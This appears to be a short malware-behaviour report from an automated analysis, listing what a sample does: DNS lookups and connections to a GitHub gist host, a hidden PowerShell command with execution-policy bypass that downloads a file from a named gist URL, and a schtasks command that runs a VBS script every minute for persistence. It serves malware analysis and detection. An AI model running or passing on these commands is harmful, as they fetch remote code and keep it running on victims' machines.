Technical Information
- <SYSTEM32>\tasks\taskwinme
- https://gist.githubusercontent.com/elmatadoure1231/3579c318275088f06e5ad440c0714c35/raw/f75d3bf46ff01f73082602062ea9a9329bc4626c/pclient.txt as c:\users\public\videos\ + pclient.txt
- 'gi##.###hubusercontent.com':443
- 'gi##.###hubusercontent.com':443
- DNS ASK gi##.###hubusercontent.com
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -windo 1 -noexit -exec bypass (New-Object Net.WebClient).DownloadFile('https://gist.githubusercontent.com/elmatadoure1231/3579c318275088f06e5ad440c0714c35/raw/f75d3bf46ff01f73082602062ea9a9329b...' (with hidden window)
- '<SYSTEM32>\schtasks.exe' /create /tn Taskwinme /sc minute /st 00:30 /tr C:\Users\Public\Videos\starpro.vbs
- '<SYSTEM32>\taskeng.exe' {B42E615D-7282-4503-8DB4-9D3397FD9E7B} S-1-5-21-1960123792-2022915161-3775307078-1001:bebrxlrlbftc\user:Interactive:[1]